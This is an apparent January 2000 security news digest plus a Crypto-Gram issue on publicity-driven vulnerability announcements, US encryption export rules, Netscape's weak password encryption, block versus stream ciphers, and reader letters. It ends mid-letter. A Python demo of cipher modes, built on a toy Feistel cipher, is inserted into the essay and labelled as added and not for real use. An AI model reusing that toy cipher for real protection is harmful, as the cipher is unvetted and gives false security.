FCW: Clinton aides fight for cybersecurity bill - Senior Clinton administration officials are urging Congress to support a bill that would provide a defense against criminals who now have access to more secure communications thanks to new encryption export regulations released this month

ZDNet: Scam tricks users into 'stealing' - So just what do computer criminals do with stolen credit cards? How about tricking innocent electronics shoppers into stealing on their behalf? That's how at least one scam artist is playing the online credit card game, MSNBC has learned

Why random numbers are important for security - Modern computer security requires some level of encryption to be applied to various kinds of data, for example secure web transactions, or SSH. But something that often goes ignored is the fact that all good crypto relies on some degree of randomness, which if not fulfilled properly can lead to a significant loss in the strength of encryption

Sophos: XM97/Divi-A Excel 97 Macro virus - XM97/Divi-A is an Excel spreadsheet macro virus. It creates a file called BASE5874.XLS in the Excel template directory, and will infect other spreadsheets as they are opened or closed

Caldera: Advisory number: CSSA-1999-039.0 Various security problems with majordomo - There are several bugs in majordomo that allow arbitrary users to execute commands with the privilege of majordomo. If the sendmail aliases file contains aliases that invoke majordomo, a compromise of additional system accounts is possible, which may further on lead to a root compromise. An immediate root exploit has not been found however

Jan 25, 2000

MontrealGazette: How safe is voice mail? - When Steven Boudrias was charged recently with infiltrating the Montreal Urban Community police department's voice-mail system, the question blinking alongside the message light on most people's phones is how safe electronic call-answering really is

Intelligence Gathering on the Net - Prerequisites for computer security professionals include a knowledge of networking, scripting languages, operating systems, and security countermeasures. High-level technical savvy marks the true professional; such expertise, however, carries a practitioner only so far. An effective professional also listens for what's coming down the track

Fairfax: Big keys unlock door to strong encryption - Australians will find it much easier to get strong cryptography protection for their on-line business activities following the United States Government's 14 January decision to liberalise its export restrictions

HP Bulletin: Security Vulnerability with PMTU strategy - An HP-UX 10.30/11.00 system can be used as an IP traffic amplifier. Small amounts of inbound traffic can result in larger amounts of outbound traffic

Sophos: WM97/Melissa-AK virus - WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a copy of the infected document to the first 50 entries in the Outlook address book. If the current day of the month is equal to the current minute it will insert the phrase Symbytes Ver. 7.x mucking about..The Mahatma. into the active document

Cisco: IPsec/CEF Software Defect on Route Switch Processors - On all RSP and RSM processors, when an interface in the router is configured with an IPSec crypto map and the switching mode is Cisco Express Forwarding (CEF), the RSP and RSM will restart when it attempts to decrypt IPSec packets. Patch not yet available, workaround is to disable Cisco Express Forwarding

Sunday Times: French spies listen in to British calls - French intelligence is intercepting British businessmen's GSM calls after investing millions in satellite technology for its listening stations

Computer Currents: Cybercrime Harder to Prosecute - US Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it

ZDNet: Hackers impersonate AOL users - Teenage hackers are pretending to be AOL users, then coercing friends into divulging personal information

Jan 24, 2000

ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave - From Web site hackers to child pornographers, credit card thieves and e-mail terrorists, crime online is mushrooming, says Schwartz. And the crime fighters are struggling to catch up

Wired: More Bad News for DVD Hackers - Judge William J. Elfving issued a preliminary injunction Friday ordering 21 defendants to stop posting code that breaks through the security software of DVDs to their Web sites

Wired: Outpost Leaves Data Unguarded - While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too

@HWA

19.0 CRYPTOGRAM Jan 15th
~~~~~~~~~~~~~~~~~~~

Forwarded From: Bruce Schneier

CRYPTO-GRAM

January 15, 2000

by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography.

Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below.

Copyright (c) 2000 by Bruce Schneier

** *** ***** ******* *********** *************

In this issue:
"Key Finding" Attacks and Publicity Attacks
Counterpane -- Featured Research
News
New U.S. Encryption Regulations
Counterpane Internet Security News
The Doghouse: Netscape
Block and Stream Ciphers
Comments from Readers

** *** ***** ******* *********** *************

"Key Finding" Attacks and Publicity Attacks

A couple of weeks ago the New York Times reported a new "key finding" attack. This was a follow-up to some research discussed here some months ago, showing how to search for, and find, public and private cryptographic keys in software because of their random bit patterns. The company nCipher demonstrated that someone who has access to a Web server that uses SSL can find the SSL private key using these techniques, and potentially steal it. nCipher's press release talked of "a significant vulnerability to today's Internet economy."

Huh? Why is this news? It's not the fact that the SSL private keys are on the Web server. That's obvious; they have to be there. It's not the fact that someone who has access to the Web server can potentially steal the private keys. That's obvious, too. It's not the news that a CGI attack can compromise data on a Web server. We've seen dozens of those attacks in 1999. Even the press release admits that "no information is known to have been compromised using a 'key-finding' attack." Neither nCipher nor the New York Times found anyone who was vulnerable.

But wait . . . nCipher sells a solution to this "problem." Okay, now I understand.

I call this kind of thing a publicity attack. It's a blatant attempt by nCipher to get some free publicity for the hardware encryption accelerators, and to scare e-commerce vendors into purchasing them. And people fall for this, again and again.

This kind of thing is happening more and more, and I'm getting tired of it. Here are some more examples:

* An employee of Cryptonym, a PKI vendor, announced that he found a variable with the prefix "NSA" inside Microsoft's cryptographic API. Based on absolutely zero evidence, this was held up as an example of NSA's manipulation of the Microsoft code.

* Some people at eEye discovered a bug in IIS last year, completely compromising the product. They contacted Microsoft, and after waiting only a week for them to acknowledge the problem, they issued a press release and a hacker tool. Microsoft rushed a fix out, but not as fast as the hackers jumped on the exploit. eEye sells vulnerability assessment tools and security consulting, by the way.

I'm a fan of full disclosure -- and definitely not a fan of Microsoft's security -- and believe that security vulnerabilities need to be publicized before they're fixed. (If you don't publicize, the vendors often don't bother fixing them.) But this practice of announcing "vulnerabilities" for the sole purpose of hyping your own solutions has got to stop.

Here are some examples of doing things right:

* The University of California Berkeley researchers have broken just about every digital cellphone security algorithm. They're not profiting from these breaks. They don't publish software packages that can listen in on cellphone calls. This is research, and good research.

* Georgi Guninski has found a huge number of JavaScript holes over the past year or so. Rather than posting scary exploits and cracking tools that script kiddies could take advantage of, and rather than trying to grab the limelight, he has been quietly publishing the problems and available workarounds. Of course, the downside is that these bugs get less attention from Microsoft and Netscape, even though they are as serious as many others that have received more press attention and thus get fixed quickly by the browser makers. Nonetheless, this is good research.

* The L0pht has done an enormous amount of good by exposing Windows NT security problems, and they don't try to sell products to fix the problems. (Although now that they've formed a VC-funded security consulting company, @Stake, they're going to have to tread more carefully.)

* Perfecto markets security against CGI attacks. Although they try to increase awareness of the risks, they don't go around writing new CGI exploits and publicizing them. They point to other CGI exploits, done by hackers with no affiliation to the company, as examples of the problem.

* Steve Bellovin at AT&T labs found a serious hole in the Internet DNS system. He delayed publication of this vulnerability for years because there was no readily available fix.

How do you tell the difference? Look at the messenger. Who found the vulnerability? What was their motivation for publicizing? The nCipher announcement came with a Business Wire press release, and a PR agent who touted the story to reporters. These things are not cheap -- the press release alone cost over $1000 -- and should be an obvious tip-off that other interests are at stake.

Also, look critically at the exploit. Is it really something new, or is it something old rehashed? Does it expose a vulnerability that matters, or one that doesn't? Is it actually interesting? If it's old, doesn't matter, and uninteresting, it's probably just an attempt at press coverage.

And look at how it is released. The nCipher release included a hacker tool. As the New York Times pointed out, "thus making e-commerce sites more vulnerable to attack and more likely to buy nCipher's product." Announcements packaged with hacker tools are more likely to be part of the problem than part of the solution.
I am a firm believer in open source security, and in publishing security vulnerabilities. I don't want the digital cellphone industry, or the DVD industry, to foist bad security off on consumers. I think the quality of security products should be tested just as the quality of automobiles is tested. But remember that security testing is difficult and time-consuming, and that many of the "testers" have ulterior motives. These motives are often just as much news as the vulnerability itself, and sometimes the announcements are more properly ignored as blatant self-serving publicity. The NY Times URLs using their search function change daily, but you can go to http://search.nytimes.com/plweb-cgi/ and use the Extended Search; the article title is "Attacks on Encryption Code Raise Questions About Computer Vulnerability". NCipher's press release: http://www.ncipher.com/news/files/press/2000/vulnerable.html NCipher's white paper (Acrobat format): http://www.ncipher.com/products/files/papers/pcsws/pcsws.pdf ** *** ***** ******* *********** ************* Counterpane -- Featured Research "A Cryptographic Evaluation of IPsec" N. Ferguson and B. Schneier, to appear We perform a cryptographic review of the IPsec protocol, as described in the November 1998 RFCs. Even though the protocol is a disappointment -- our primary complaint is with its complexity -- it is the best IP security protocol available at the moment. http://www.counterpane.com/ipsec.html ** *** ***** ******* *********** ************* News You can vote via the Internet in the Arizona Democratic primary. Does anyone other than me think this is terrifying? http://dailynews.yahoo.com/h/nm/19991217/wr/arizona_election_1.html An expert at the British government's computer security headquarters has endorsed open-source solutions as the most secure computer architecture available: http://212.187.198.142/news/1999/50/ns-12266.html The DVD Copy Control Association is pissed, and they're suing everyone in sight. 
http://www.cnn.com/1999/TECH/ptech/12/28/dvd.crack/ Moore's Law and its effects on cryptography: http://www.newscientist.com/ns/20000108/newsstory2.html Information warfare in the Information Age: http://www.cnn.com/1999/TECH/computing/12/30/info.war.idg/index.html http://www.it.fairfax.com.au/industry/19991227/A59706-1999Dec27.html Radio pirates: In the U.K., some radios can receive a digital signal that causes them to automatically switch to stations playing traffic reports. Hackers have figured out how to spoof the signal, forcing the radio to always tune to a particular station. Good illustration of the hidden vulnerabilities in digital systems. http://news.bbc.co.uk/hi/english/sci/tech/newsid_592000/592972.stm http://uk.news.yahoo.com/000106/18/d6jt.html Well, this sure is inaccurate: http://www.lancrypto.com/algorithms_e.htm Some months ago I mentioned the Y2K notice from Hart Scientific. They now have a sequel: http://www.hartscientific.com/y2k-2.htm RSA "digital vault" software: http://news.excite.com/news/pr/000111/ma-rsa-keon-software E-commerce encryption glitch; a good example of why people are the worst security problem. A programmer just forgot to reactivate the encryption. http://news.excite.com/news/r/000107/17/news-news-airlines-northwest Become an instant cryptography portal. Encryption.com, encryption2000.com, and 1-800-ENCRYPT are for sale. http://news.excite.com/news/bw/000111/wa-azalea-software http://www.encryption.com Mail encryption utility that lets you take back messages you regret sending. Does anyone believe that this is secure? http://www.zdnet.com:80/anchordesk/story/story_4323.html Human GPS implants: http://www.newscientist.com/ns/20000108/newsstory8.html Clinton's hacker scholarships: http://chronicle.com/free/2000/01/2000011001t.htm Microsoft is building a VPN into Windows 2000. Whose tunnel do you want to hack today? 
http://www.networkworld.com/news/2000/0110vpn.html Someone stole a bunch of credit card numbers from CD Universe, tried extortion, then posted some: http://www.wired.com/news/technology/0,1282,33563,00.html http://www.msnbc.com/news/355593.asp and Cybercash's reaction (with a nice quote about how impregnable their product's security is; way to wave a red flag at the hackers): http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html An interesting three-part article about video surveillance and its effect on society: http://www.villagevoice.com/issues/9840/boal.shtml The system used to fund a series of anti-Bush commercials loosely resembles my "street performer protocol," using the credit card company instead of a publisher as a trusted third party. They validate your card when you pledge, but only charge it if they get enough to run an ad: http://www.gwbush.com/ Street performer protocol: http://www.counterpane.com/street_performer.html You can steal subway rides on the NY City system by folding the Metrocard at precisely the right point. The Village Voice and NY Times ran stories about it, but those are no longer available, at least for free. There's a copy of the NYTimes story here: http://www.monkey.org/geeks/archive/9801/msg00052.html The 2600 "Off the Hook" RealAudio for 2/3/98 talks about it, starting around 54:35. The RealAudio is linked from here: http://www.2600.com/offthehook/1998/0298.html The White House released a national plan to protect America's computer systems from unauthorized intrusions. This plan includes the establishment of the controversial Federal Intrusion Detection Network (FIDNET), which would monitor activity on government computer systems. (So far, there are no plans to monitor commercial systems, but that can change. The government does want to involve industry in this.) 
The plan also calls for the establishment of an "Institute for Information Infrastructure Protection" and a new program that will offer college scholarships to students in the field of computer security in exchange for public service commitments. The scholarship program seems like a good idea; we need more computer security experts. http://www.thestandard.com/article/display/0,1151,8661,00.html http://dailynews.yahoo.com/h/ap/20000107/ts/clinton_cyber_terrorism_4.html http://news.excite.com/news/ap/000107/01/tech-clinton-cyber-terrorism http://www.msnbc.com/news/355783.asp http://www.computerworld.com/home/print.nsf/all/000107DB3A EPIC analysis: http://www.epic.org/security/CIP/ White House plan (PDF): http://www.whitehouse.gov/WH/EOP/NSC/html/documents/npisp-execsummary-000105 .pdf White House press release: http://www.epic.org/security/CIP/WH_pr_1_7_00.html White House press briefing: http://www.epic.org/security/CIP/WH_briefing_1_7_00.html ** *** ***** ******* *********** ************* New U.S. Encryption Regulations We have some, and they're a big improvement. On the plus side, "retail" encryption products -- like browsers, e-mail programs, or PGP -- will be widely exportable to all but a few countries "regardless of key length or algorithm." On the minus side, the new regulations are complex (an unending stream of work for the lawyers) and will still make it difficult for many people to freely exchange encryption products. They also do not address the Constitutional free speech concerns raised by encryption export controls. Major features of the new regs: * "Retail" encryption products are be exportable, regardless of key length or algorithm, to all but the designated "T-7" terrorist nations. In order to export you need to fill out paperwork. You need to get a retail classification, submit your product to a one-time technical review, and submit periodic reports of who products are shipped to (but not necessarily report end users). 
* Export of encryption products up to 64 bits in key length is completely liberalized.

* "Non-retail" products will require a license for many exports, such as to foreign governments or foreign ISPs and telcos under certain circumstances.

* Source code that is "not subject to an express agreement for the payment of a licensing fee or royalty for commercial production or sale of any product developed with the source code" is freely exportable to all but the T-7 terrorist countries. Source code exporters are required to send the Department of Commerce a copy of the code, or a URL, upon publication. Note that posting code on a web site for anonymous download is allowed; you are not required to check that downloaders might be from one of the prohibited countries.

One obvious question is: "How does this affect the Bernstein and Karn court cases?" I don't know yet. The free speech concerns are not addressed, but the things that Bernstein and Karn wanted to do are now allowed. We'll have to see what the attorneys think.

A more personal question is: "How does this affect the Applied Cryptography source code disks?" Near as I can tell, all I have to do is notify the right people and I can export them. I will do so as soon as I can. Stay tuned.
The actual regs (legalese):
http://www.eff.com/pub/Privacy/ITAR_export/2000_export_policy/20000112_cryptoexport_regs.html
EFF's press release:
http://www.eff.com/11300_crypto_release.html
Reuters story with BSA and Sun reactions:
http://news.excite.com/news/r/000112/19/tech-tech-encryption
Reuters story with EFF reaction:
http://news.excite.com/news/r/000113/13/tech-tech-encryption
AEA reaction press release:
http://news.excite.com/news/pr/000112/dc-aea-encryption-reg
ACLU and EPIC reaction:
http://news.excite.com/news/zd/000113/18/crypto-compromise-a

** *** ***** ******* *********** *************

Counterpane Internet Security News

Bruce Schneier profiled in Business Week:
http://businessweek.com/cgi-bin/ebiz/ebiz_frame.pl?url=/ebiz/9912/em1229.htm

Bruce Schneier is speaking at BlackHat in Singapore, 3-4 April 2000. He'll also be at BlackHat and DefCon in Las Vegas.
http://www.blackhat.org
http://www.defcon.org

Bruce Schneier is speaking at the RSA Conference in San Jose: Tuesday, 18 Jan, 2:00 PM, on the Analyst's Track. I don't know if it made it into the program, but Bruce will be on stage with Matt Blaze, Steve Bellovin, and several other really smart people.

** *** ***** ******* *********** *************

The Doghouse: Netscape

Netscape encrypts users' e-mail passwords with a lousy algorithm. If this isn't enough, their comments to the press cement their inclusion in the doghouse:

"Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that 'computer experts could still access the information, in case someone forgot their password.'"

In other words, they implemented lousy security on purpose.

"Netscape's Saito said the company wasn't aware of the vulnerability and added that a 'security fix' would be forthcoming if that vulnerability were proved to exist.
If the Javascript vulnerability doesn't exist, a password stealer would have to have physical access to a user's computer to figure out the algorithm."

Note the complete ignorance of viruses like Melissa, or Trojan horses like Back Orifice.

"Saito noted that Netscape already has numerous safety features, including a Secure Sockets Layer, which enables users to communicate securely with Web servers, and a protocol for encrypting e-mail messages sent."

None of which matters if the password is stolen.

http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html
RST's information:
http://www.rstcorp.com/news/bad-crypto.html
http://www.rstcorp.com/news/bad-crypto-tech.html

** *** ***** ******* *********** *************

Block and Stream Ciphers

Block and stream ciphers both transform a message from plaintext to ciphertext one piece at a time. Block ciphers apply the same transformation to every piece of the message, and typically deal with fairly large pieces of the message (8 bytes, 16 bytes) at a time. Stream ciphers apply a different transformation to each piece of the message, and typically deal with fairly small pieces of the message (1 bit, 1 byte) at a time. Traditionally they have been separate areas of research, but these days they are converging. And if you poke around at the issues a bit, you'll see that they are not very different at all.

Stream ciphers first. Traditional stream ciphers consist of three standard pieces: an internal state, a next-state function, and a plaintext-to-ciphertext transformation function. The internal state is generally small, maybe a hundred bits, and can be thought of as the key. The next-state function updates the state. The transformation function takes a piece of plaintext, mixes it with the current state, and produces the same size ciphertext. And then the stream cipher goes on to the next piece. The security of this scheme is based on how cryptographically annoying the two functions are.
Sometimes just one of the functions is cryptographically annoying. In electronic stream ciphers, a complicated next-state function is usually combined with a simple transformation that takes the low-order bit of the state and XORs it with the plaintext. In rotor machines, such as the German Enigma, the next-state function was a simple stepping of various rotors, and the transformation function was very complicated. Sometimes both are cryptographically complicated.

These ciphers could generally operate in two modes, depending on the input into the next-state function. If the only input was the current state, these were called output-feedback (OFB) ciphers. If there was the additional input of the previous ciphertext bit, these were called cipher-feedback (CFB) ciphers. (If you were in the U.S. military, you knew these modes as "key auto-key" (KAK) and "ciphertext auto-key" (CTAK), respectively.) And you chose one mode over the other because of error propagation and resynchronization properties. (Applied Cryptography explains all this in detail.)

Traditionally, stream cipher algorithms were as simple as possible. These were implemented in hardware, and needed as few gates as possible. They had to be fast. The result was many designs based on simple mathematical functions: e.g., linear feedback shift registers (LFSRs). They were analyzed based on metrics such as linear complexity and correlation immunity. Analysts looked at cycle lengths and various linear and affine approximations. Most U.S. military encryption algorithms, at least the ones in general use in the 1980s and before, are stream ciphers of these sorts.

Block ciphers are different. They consist of a single function: one that takes a plaintext block (a 64-bit block size is traditional) and a key and produces a ciphertext block. The NSA calls these ciphers codebooks, and that is an excellent way to think of them. For each key, you can imagine building a table.
On the left column is every possible plaintext block; on the right column is every possible ciphertext block. That's the codebook. It would be a large book, 18 billion billion entries for the smallest commonly used block ciphers, so it is easier to just implement the algorithm mathematically -- especially since you need a new book for each key. But in theory, you could implement it as a single table lookup in a very large codebook.

Block ciphers can be used simply as codebooks, encrypting each 64-bit block independently (and, in fact, that is called electronic codebook (ECB) mode), but that has a bunch of security problems. An attacker can rearrange blocks, build up a portion of the codebook if he has some known plaintext, etc. So generally block ciphers are implemented in one of several chaining modes.

Before listing the block cipher chaining modes, it's worth noticing that a block cipher algorithm can serve as any of the functions needed to build a stream cipher: the next-state function or the output function. And, in fact, that is what block cipher modes are: stream ciphers built using the block cipher as a primitive. A block cipher in output-feedback mode is simply the block cipher used as the next-state function, with the output of the block cipher being the simple output function. A block cipher in cipher-feedback mode is the same thing, with the addition of the ciphertext being fed into the next-state function. A block cipher in counter mode uses the block cipher as the output function, and a simple counter as the next-state function. Cipher block chaining (CBC) is another block-cipher mode; I've seen the NSA call this "cipher-driven codebook" mode. Here the block cipher is part of the plaintext-to-ciphertext transformation function, and the next-state function is simple.

For some reason I can't explain, for many years academic research on block ciphers was more practical than research on stream ciphers.
There were more concrete algorithm proposals, more concrete analysis, and more implementations. While stream cipher research stayed more theoretical, block ciphers were used in security products. (I assume this was the reverse in the military, where stream ciphers were used in products and were the target of operational cryptanalysis resources.) DES's official sanction as a standard helped this, but before DES there was Lucifer. And after DES there was FEAL, Khufu and Khafre, IDEA, Blowfish, CAST, and many more.

Recently, stream ciphers underwent something of a renaissance. These new stream ciphers were designed for computers and not for discrete hardware. Instead of producing output a bit at a time, they produced output a byte at a time (like RC4), or 32 bits at a time (like SEAL or WAKE). And they were no longer constrained by a small internal state -- RC4 takes a key and turns it into a 256-byte internal state, SEAL's internal state is even larger -- or tight hardware-based complexity restrictions. Stream ciphers, which used to be lean and mathematical, started looking as ugly and kludgy as block ciphers. And they started appearing in products as well.

So, block and stream ciphers are basically the same thing; the difference is primarily a historical accident. You can use a block cipher as a stream cipher, and you can take any stream cipher and turn it into a block cipher. The mode you use depends a lot on the communications medium -- OFB or CBC makes the most sense for computer communications with separate error detection, while CFB worked really well for radio transmissions -- and the algorithm you choose depends mostly on performance, standardization, and popularity.

There's even some blurring in modern ciphers. SEAL, a stream cipher, looks a lot like a block cipher in OFB mode. Skipjack, an NSA-designed block cipher, looks very much like a stream cipher. Some new algorithms can be used both as block ciphers and stream ciphers.
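The modes described above, as an added example that is not part of the Crypto-Gram essay: a block cipher used as the next-state or output function of a stream cipher, with OFB, CFB and counter mode written in exactly those terms, plus a check of the error-propagation behaviour the essay says decides between them. The 16-byte Feistel block cipher built on HMAC-SHA256 is a constructed stand-in for a real block cipher (not for real use), and the key, IV, nonce and plaintext are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 16                 # block size in bytes
HALF = BLOCK // 2

# Constructed sample values, chosen for the demonstration only.
KEY = b"constructed-demo-key-0001"
IV = bytes(range(BLOCK))   # initial state for OFB/CFB; must never repeat under one key
NONCE = b"\xaa" * 8        # 8-byte nonce, paired with an 8-byte counter in CTR
PLAINTEXT = b"block cipher modes are stream ciphers built from a block cipher."  # 64 bytes


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))   # truncates to the shorter input


def chunks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def _round(key, i, half):
    # Round function F_i(half): HMAC-SHA256 truncated to one half-block.
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:HALF]


def block_encrypt(key, block):
    """Stand-in block cipher: a 4-round Feistel permutation on 16-byte blocks.

    It plays the role DES or Blowfish would. Only the forward direction is
    ever needed below, which is the point of the essay: each stream mode
    uses the block cipher as a next-state or output function, never its inverse."""
    assert len(block) == BLOCK
    l, r = block[:HALF], block[HALF:]
    for i in range(4):
        l, r = r, xor(l, _round(key, i, r))
    return r + l           # undo the final swap


def ofb(key, iv, data):
    """OFB ("key auto-key"): next-state = E_k(state); output = state.
    The keystream depends only on key and IV, so encrypt == decrypt."""
    state, out = iv, b""
    for block in chunks(data):
        state = block_encrypt(key, state)   # next-state function
        out += xor(block, state)            # plaintext-to-ciphertext transformation
    return out


def cfb_encrypt(key, iv, data):
    """CFB ("ciphertext auto-key"): the previous ciphertext block is the
    additional input to the next-state function."""
    state, out = iv, b""
    for block in chunks(data):
        c = xor(block, block_encrypt(key, state))
        out += c
        state = c                           # ciphertext fed back as the new state
    return out


def cfb_decrypt(key, iv, data):
    state, out = iv, b""
    for c in chunks(data):
        out += xor(c, block_encrypt(key, state))
        state = c                           # same feedback, from received ciphertext
    return out


def ctr(key, nonce, data):
    """Counter mode: next-state = counter + 1; output = E_k(nonce || counter).
    Self-inverse like OFB, and every block can be computed independently."""
    out = b""
    for i, block in enumerate(chunks(data)):
        counter = i.to_bytes(BLOCK - len(nonce), "big")
        out += xor(block, block_encrypt(key, nonce + counter))
    return out


def damaged_blocks(encrypt, decrypt, key, iv, plaintext, flip_block=1):
    """Flip one ciphertext bit in block `flip_block` and return the indices of
    plaintext blocks that then decrypt wrongly: the error-propagation
    property that decides between OFB/CTR and CFB for a given channel."""
    ct = bytearray(encrypt(key, iv, plaintext))
    ct[flip_block * BLOCK] ^= 0x01
    recovered = decrypt(key, iv, bytes(ct))
    return [i for i, (p, q) in enumerate(zip(chunks(plaintext), chunks(recovered))) if p != q]


if __name__ == "__main__":
    # OFB and CTR: one flipped bit damages one block. CFB: that block plus the
    # next one (whose keystream is E_k of the damaged block), then it resynchronizes.
    print("OFB damages blocks", damaged_blocks(ofb, ofb, KEY, IV, PLAINTEXT))                  # [1]
    print("CFB damages blocks", damaged_blocks(cfb_encrypt, cfb_decrypt, KEY, IV, PLAINTEXT))  # [1, 2]
    print("CTR damages blocks", damaged_blocks(ctr, ctr, KEY, NONCE, PLAINTEXT))               # [1]
```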
But stream ciphers should be faster than block ciphers. Currently the fastest block ciphers encrypt data at 18 clock cycles per byte (that's Twofish, the fastest AES submission). The fastest stream ciphers are even faster: RC4 at 9 clock cycles per byte, and SEAL at 4. (I'm using a general 32-bit architecture for comparison; your actual performance may vary somewhat.)

I don't believe this is an accident. Stream ciphers can have a large internal state that changes for every output, but block ciphers have to remain the same. RC4 has a large table -- you can think of it as an S-box -- that changes every time there is an output. Most block ciphers also have some kind of S-box, but it remains constant for each encryption with the same key.

There's no reason why you can't take a block cipher, Blowfish for example, and tweak it so that the S-boxes modify themselves with every output. If you're using the algorithm in OFB mode, it will still encrypt and decrypt properly. But it will be a lot harder to break for two reasons. One, the internal state is a moving target and it is a lot harder for an attacker to build a model of what is going on inside the state. Two, if the plaintext-to-ciphertext transformation is built properly, attacks based on chosen plaintext or chosen ciphertext are impossible. And if it is a lot harder to break a cipher with self-modifying internals, then you can probably get by with fewer rounds, or less complexity, or something. I believe that there is about a factor of ten speed difference between a good block cipher and a good stream cipher.

Designing algorithms is very hard, and I don't suggest that people run out and modify every block cipher they see. We're likely to continue to use block ciphers in stream-cipher modes because that's what we're used to, and that's what the AES process is going to give us as a new standard.
But further research into stream ciphers, and ways of taking advantage of the inherent properties of stream ciphers, is likely to produce families of algorithms with even better performance.

** *** ***** ******* *********** *************

Comments from Readers

From: Markus Kuhn
Subject: German smart-card hack

The note on "German hackers have succeeded in cracking the Siemens digital signature chip" in the 1999-12-15 CRYPTO-GRAM is wrong.

I have been in contact with the German Hacker (Christian Kahlo) behind this story. He discovered that one user of the Siemens SLE44 chip series included in his ROM software a routine that allowed him to upload and execute not only interpreter bytecode, but also raw 8052 assembler instructions. Using this undocumented facility, Christian uploaded a tiny assembler program that dumped the entire ROM of the card. The ROM was investigated, posted on the USENET as a documented disassembler listing in a TeX file and no vulnerabilities were found. Christian also discovered in the ROM that the SLE chips send out the chip type and serial number when the I/O line is held low during a positive reset edge and the following 600-700 clock cycles, which is a perfectly normal feature (comparable to the BIOS power-up message of a PC) that is fully documented in the SLE44 data sheets and that is not security relevant.

No smartcard applications were hacked this way, no vulnerability was found in any smartcard application, and definitely no private keys were compromised. All this also has nothing to do with digital signatures. Any news to the contrary is the result of misunderstandings by journalists, who as usual fill in the gaps of the story with their limited technical background knowledge and try to formulate such reports to be more spectacular than the story behind them.
The only policy that has been violated here is that Siemens -- like most other smartcard chip producers -- tries to make sure that nobody except big customers can easily get access to smartcard development kits that allow to upload assembler code directly, which might otherwise shorten the learning curve for a microprobing attacker slightly. Users of Siemens chips that allow code uploads are apparently required to use a bytecode interpreter instead. This policy seems to have been ignored secretly by one Siemens customer who left a backdoor in his byte-code interpreter to enable the later upload of high-speed crypto routines that cannot be implemented sufficiently efficiently in the bytecode. Christian discovered this, even though he decided *not* to publish the details on how he did this or the name of the Siemens customer in whose cards he had discovered this. All he published was a dump of the standard Siemens SLE ROM code (CMS = Chip Management System, comparable to a PC BIOS), a piece of code that had already been known semi-publicly for many years in the pay-TV hacking community from successful microprobing attacks on the SLE44 series.

Christian's main contribution is that he has discovered a very nice low-cost assembler-level development kit for some of the SLE smartcards, which used to cost a fortune and an NDA before. This is not the first time that this has happened: Pay-TV smartcards have been shipped before with software that provides for uploads of EEPROM software patches with broken authentication techniques, which has been known and used in the smartcard tampering community for many years.

From: anonymous
Subject: Re: New U.S. Crypto Export Regulations

In CRYPTO-GRAM of December 15, 1999 you wrote about the proposed new U.S. crypto export regulations, and I can agree with everything you said. However, I believe you missed something important: the view FROM the rest of the world.
I work in the finance industry in Europe -- Zurich, to be precise -- and have some involvement with security. This industry (a) WILL NOT use U.S. crypto products, and (b) will certainly NOT make any long-term plans or partnerships to do so for U.S. products with consumer content, because (a) the products to date are forced by law to be weak, but more important, (b) the U.S. government can't be trusted. Even if it approved today the export of some products based on strong crypto, everyone knows that this permission could be terminated tomorrow for the same or other products. And everyone also suspects strongly that the U.S. government will in any case force providers to put trap doors into their products.

Under the circumstances, the European finance and e-business industries would have to be crazy to use U.S. crypto-based products. And they're not crazy. To play in this business in the rest of the world, the U.S. will have to have a clear, consistent, and favorable policy, and U.S. companies will have to present products that are demonstrably strong with no trap doors. (I invite you to speculate if this will happen before Hell freezes over.)

In the meantime, there are plenty of non-U.S. products to choose from, and banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche Bank, Generale Bank, Bank Austria, and Barclays are not sitting back anxiously waiting for U.S. products to become available. They're doing business with non-U.S. products that are just fine, thank you.

From: "Grawrock, David"
Subject: Electronic voting

All these comments regarding electronic voting and absentee voting are missing the mark. The State of Oregon has that all elections (except presidential) are done by mail. It's like the entire state is voting absentee. The process is actually pretty painless. You receive your voter pamphlet and then you get your ballot. It has to be in by election day.
If you miss the excitement of going to the voting booth there are collection points where you can drop off your filled in ballot. It's really not that hard. The point here is that the state has determined that it is easier (and cheaper) to simply process the entire election via the absentee process. It now becomes a simple step to go from by mail to by electronic voting. All of the arguments regarding coercion must already have been answered (the government always thinks a process through completely). We have elected all sorts of politicians without anyone coming back and reporting problems with coercion.

From: Gerry Brown
Subject: RE: Absentee Ballots

I just checked some figures with a friend who has the data on Absentee Ballots for San Mateo County in California and he has compared it with the San Francisco elections held this week. The percentage of registered voters using absentee ballots is about 13%-15%. But more astonishing is the fact that 35%-50% of those actually voting are done by absentee ballots. The lower figure is for national elections and the higher side corresponds to local elections.

From: "Hillis, Brad"
Subject: PKI article--agree and disagree

I can't begin to tell you how much I enjoyed your article with Carl Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key." I'm the lead ecommerce attorney for the state of Washington, and we are currently procuring a private PKI vendor to provide digital signatures for state and local government, similar to the federal government ACES procurement.

What you say that PKI is not needed for ecommerce to flourish is true. It's a thought I keep having at all the digital signature law presentations I attend, and the theme I had planned to discuss at my March 7 talk in Boston on PKI. One has to keep asking oneself, why do I need a digital signature? What is the opportunity cost of setting up a PKI?
(That is, what security improvements could I make if I spent the money on something besides PKI?)

However, I disagree with this statement in your article: "In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible."

